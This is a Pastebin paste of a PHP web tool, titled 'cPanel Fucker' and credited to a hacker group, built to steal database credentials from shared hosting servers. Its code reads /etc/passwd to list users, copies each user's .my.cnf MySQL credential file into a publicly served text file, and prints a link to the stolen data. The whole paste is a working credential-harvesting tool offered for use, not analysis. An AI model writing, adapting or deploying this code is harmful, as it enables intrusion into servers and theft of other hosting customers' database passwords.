Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <link rel="SHORTCUT ICON" type="image/x-icon" href="http://s13.postimg.org/d82nq5frb/UBHFinal1.png">
- <title>cPanel Fucker</title>
- <style>
- @import url(http://fonts.googleapis.com/css?family=Lobster);
- body {
- background-color:#000;
- color:red;
- margin: 0;
- padding: 0;
- font-family: "Lobster", cursive;
- }
- input {
- border:3px solid #ddd;
- background-color:#333;
- font:12pt Verdana;
- color: #ddd;
- padding: 4px 3px;
- transition: all .3s;
- cursor: pointer;
- }
- input:hover {
- border:3px solid #333;
- background-color:#ddd;
- color: #333;
- }
- a {
- color:#0FF;
- text-decoration:none
- }
- a:hover {
- color:#fff
- }
- p {
- background-color:#000;
- border:1px solid #0FF;
- color:#fff;
- position:fixed;
- bottom:0;
- width:100%
- }
- </style>
- </head>
- <body>
- <center>
- <a href="https://www.facebook.com/groups/united.bangladeshi.hacker/" target="_blank"> <img src="http://s13.postimg.org/d82nq5frb/UBHFinal1.png" border="0"></a>
- <h2>cPanel Fucker By D3t0N4t0R || Powerin10</h2>
- <form method="get">
- <input type="submit" name="do" value="kupa cpanel"><br><br>
- </form>
- <p>Coded by Mehedi (D3t0N4t0R) || Special thanks to Powerin10</p>
- </body> <?php if (isset($_GET['do'])) { if ($_GET['do'] == 'kupa cpanel') { $users = file("/etc/passwd"); $lolx = array(); foreach ($users as $user) { $users = explode(":", $user); $lolx[] = $users[0]; } foreach ($lolx as $lol) { if (file_exists("/home/{$lol}/.my.cnf")) { $garam = file_get_contents("/home/{$lol}/.my.cnf"); if (!empty($garam)) { $masala = $garam . "
- "; $handle = fopen('fucked.txt', 'a'); fwrite($handle, $masala); } } } if (filesize('fucked.txt') > 0) { $url = 'http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/fucked.txt'; echo '<a href="' . $url . '" target="_blank">Fucked cPanels</a>'; } } } ?>
Advertisement
Add Comment
Please, Sign In to add comment